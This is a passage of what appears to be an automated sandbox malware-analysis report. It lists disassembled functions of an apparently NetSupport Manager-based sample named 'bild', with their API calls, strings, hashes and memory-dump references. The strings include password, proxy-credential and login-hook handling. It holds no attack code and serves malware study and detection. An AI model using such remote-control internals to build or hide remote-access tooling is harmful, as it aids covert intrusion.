Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

Function 6C5E6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6C5E6BD5
GetTickCount.KERNEL32 ref: 6C5E6C26
Sleep.KERNEL32(00000064), ref: 6C5E6C5B

Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950

WaitForSingleObject.KERNEL32(00000300,?), ref: 6C5E6C7C
_memmove.LIBCMT ref: 6C5E6C93
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C5E6CB4
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C5E6CD9
GetTickCount.KERNEL32 ref: 6C5E6CEC
_calloc.LIBCMT ref: 6C5E6D76
GetTickCount.KERNEL32 ref: 6C5E6DF3
InterlockedExchange.KERNEL32(03682F3A,00000000), ref: 6C5E6E01
_calloc.LIBCMT ref: 6C5E6E33
_memmove.LIBCMT ref: 6C5E6E47
InterlockedDecrement.KERNEL32(03682EE2), ref: 6C5E6EC3
SetEvent.KERNEL32(00000308), ref: 6C5E6ECF
_memmove.LIBCMT ref: 6C5E6EF4
GetTickCount.KERNEL32 ref: 6C5E6F4F
InterlockedExchange.KERNEL32(03682E82,-6C61A188), ref: 6C5E6F60

Strings

ResumeTimeout, xrefs: 6C5E6BBA
ProcessMessage returned FALSE. Terminating connection, xrefs: 6C5E6F25
httprecv, xrefs: 6C5E6BDD
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E6E62
ReadMessage returned FALSE. Terminating connection, xrefs: 6C5E6F3A
FALSE, xrefs: 6C5E6E67

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
Instruction ID: adf0c25f8261296612d28c6f0cec855ec173c374a3f15780385c7ff393ddaeb6
Opcode Fuzzy Hash: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
Instruction Fuzzy Hash: F9B1C1B1D00258DFDF20DB69CD85BDA73B4EB4834AF00449AE649E7A40DBB49AC4CF95

Function 11086700 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
LoadLibraryA.KERNEL32(?), ref: 110867EC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860

Strings

CipherServer_ResetSession, xrefs: 1108688D
CipherServer_CloseSession, xrefs: 11086849
CryptPak.dll, xrefs: 1108675B, 110867BE
CipherServer_OpenSession, xrefs: 11086838
CipherServer_GetRandomData, xrefs: 1108687C
CipherServer_DecryptBlocks, xrefs: 1108686B
CipherServer_EncryptBlocks, xrefs: 1108685A
CipherServer_Create, xrefs: 11086801
CipherServer_Destroy, xrefs: 11086816
CipherServer_GetInfoBlock, xrefs: 11086827

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

Function 11141890 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 1114194A

Strings

Info. Policy changed - re-initui, xrefs: 11142012
Info. Lockup averted for AD policy changes, xrefs: 11141B1D, 11141B44
client., xrefs: 11141D46
Chg [%s]%s=%s, xrefs: 11141EF5
NSM.LIC, xrefs: 11141950
Warning. Can't calc AD policy changes, xrefs: 11141D85
_debug, xrefs: 11141DE6
TracePolicyChange, xrefs: 11141DE1
RoomSpec, xrefs: 11141DC7, 1114207A
client, xrefs: 11141D63
Info. Policy changed - reload transports..., xrefs: 11142036
NSA.LIC, xrefs: 1114195F, 11141966, 1114198D
IsA(), xrefs: 111420CD
Del [%s]%s=%s, xrefs: 11141E95
Add [%s]%s=%s, xrefs: 11141E36
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 111420C8
Client, xrefs: 11141DCC, 1114207F

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3535843008-2062829784
Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

Function 11074A00 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
_strncpy.LIBCMT ref: 11074B68
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
std::exception::exception.LIBCMT ref: 11074D68
__CxxThrowException@8.LIBCMT ref: 11074D83

Strings

..\ctl32\Connect.cpp, xrefs: 11074B16
DefaultUsername, xrefs: 11074BB0
destroy_queue == NULL, xrefs: 11074B1B
Password, xrefs: 11074C23
RememberPassword, xrefs: 11074B80
General, xrefs: 11074B85, 11074BB5, 11074C28

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
API String ID: 703120326-1497550179
Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65

Function 11108D30 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
CloseHandle.KERNEL32(00000000), ref: 11108E19
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
LoadLibraryA.KERNEL32(?), ref: 11108E61
GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
FreeLibrary.KERNEL32(?), ref: 11108ECB

Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321

GetStockObject.GDI32(0000000D), ref: 11108EDF
GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16

Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2

CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59

Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27

CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF

Strings

\pcigina, xrefs: 11108E40
nsm_gina_sas, xrefs: 11108DF4
LoggedOn, xrefs: 11108EA0
GrabKM, xrefs: 11108E88
LPT1, xrefs: 11108DE9

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
API String ID: 3930710499-403456261
Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11

Function 11138C30 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA

PostMessageA.USER32(000404A0,000006CF,00000007,00000000), ref: 11138E0F

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

SetWindowTextA.USER32(000404A0,00000000), ref: 11138EB7
IsWindowVisible.USER32(000404A0), ref: 11138F7C
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
IsWindowVisible.USER32(000404A0), ref: 11138FAA
SetForegroundWindow.USER32(00000000), ref: 11138FD8
EnableWindow.USER32(000404A0,00000001), ref: 11138FE7
IsWindowVisible.USER32(000404A0), ref: 11139038
IsWindowVisible.USER32(000404A0), ref: 11139045
EnableWindow.USER32(000404A0,00000000), ref: 11139059
EnableWindow.USER32(000404A0,00000000), ref: 11138FBF

Part of subcall function 11131210: ShowWindow.USER32(000404A0,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234

EnableWindow.USER32(000404A0,00000001), ref: 1113906D

Strings

HideWhenIdle, xrefs: 11138CAC
ViewedText, xrefs: 11138D3B
LockedText, xrefs: 11138D8F
ShowUIOnConnect, xrefs: 11138DED
Client, xrefs: 11138CB1, 11138D5B, 11138D94, 11138DF2
ConnectedText, xrefs: 11138D48, 11138D57

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751

Function 6C5E33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6C5E34FD
wsprintfA.USER32 ref: 6C5E3727

Strings

ProxyUsername, xrefs: 6C5E36E0
UsePinProxy, xrefs: 6C5E35D0
r<^l, xrefs: 6C5E33B3
:%d, xrefs: 6C5E34F7
*PINServer, xrefs: 6C5E35C4
PinProxy, xrefs: 6C5E35ED
%s:%s, xrefs: 6C5E3721
ProxyCred, xrefs: 6C5E362A
Gateway_UseWebProxy, xrefs: 6C5E3585
Gateway, xrefs: 6C5E3577
client247, xrefs: 6C5E362F
*GatewayAddress, xrefs: 6C5E3430
*WebProxy, xrefs: 6C5E3459
P, xrefs: 6C5E3533
ProxyPassword, xrefs: 6C5E36F7
Gateway_WebProxy, xrefs: 6C5E359D
*UseWebProxy, xrefs: 6C5E343C

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<^l
API String ID: 2111968516-2245968893
Opcode ID: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
Instruction ID: 7efd35a4ae0c02fe8056c906006a5b9779c271741d730474cfeafd88f3de7ded
Opcode Fuzzy Hash: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
Instruction Fuzzy Hash: AD2288B2A04368ABDB24DF68CC80EEAB7B9EB49304F0485D9E54967A40D7315FC8CF51

Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1

Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E

wsprintfA.USER32 ref: 11028214
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
wsprintfA.USER32 ref: 11028291
CloseHandle.KERNEL32(?), ref: 110282A7
CloseHandle.KERNEL32(?), ref: 110282B0
LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325

Strings

Locales\%d\, xrefs: 11028281
Setting resource langid=%d, xrefs: 110282D1
NSM.LIC, xrefs: 110281B9, 110282D0
pcicl32_res.dll, xrefs: 110282E9
\GetUserLang.exe", xrefs: 1102820E
", xrefs: 110281EA
SetClientResLang called, gPlatform %x, xrefs: 110281BC

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-419896573
Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0

Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

